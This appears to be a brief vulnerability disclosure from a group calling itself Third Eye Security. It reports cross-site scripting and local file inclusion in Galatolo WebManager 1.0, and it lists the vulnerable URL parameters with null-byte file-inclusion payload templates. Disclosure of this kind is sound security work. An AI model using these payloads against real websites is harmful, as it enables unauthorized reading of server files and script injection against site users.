Galatolo WebManager versions 1.0 and below suffer from local file inclusion and cross site scripting vulnerabilities.
17fa838f9854606a7ed484c50a880d9b93969fe5cb1b674b3722859b2547223e
[*]================================================================================[*]
| _____ _ _ _ _____ |
| |_ _| |__ (_)_ __ __| | | ____| _ ___ |
| | | | '_ \| | '__/ _` | | _|| | | |/ _ \ |
| | | | | | | | | | (_| | | |__| |_| | __/ |
| |_| |_| |_|_|_| \__,_| |_____\__, |\___| |
| |___/ |
| ____ _ _ |
| / ___| ___ ___ _ _ _ __(_) |_ _ _ |
| \___ \ / _ \/ __| | | | '__| | __| | | | |
| ___) | __/ (__| |_| | | | | |_| |_| | |
| |____/ \___|\___|\__,_|_| |_|\__|\__, | |
| |___/ |
[*]================================================================================[*]
| Author: StAkeR ~ StAkeR@hotmail.it |
[*]================================================================================[*]
| Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen |
[*]================================================================================[*]
| Galatolo WebManager 1.0 <= Cross Site Scripting and Local File Inclusion |
[*]================================================================================[*]
| Download: http://www.gwm.dev-area.org/GWM.zip |
[*]================================================================================[*]
| Cross Site Scripting => /result.php?key= [Your code javascript] |
| Local File Inclusion => admin/plugins.php?plugin= [File] %0 |
| Local File Inclusion => index.php?com= [File]%00 |
[*]================================================================================[*]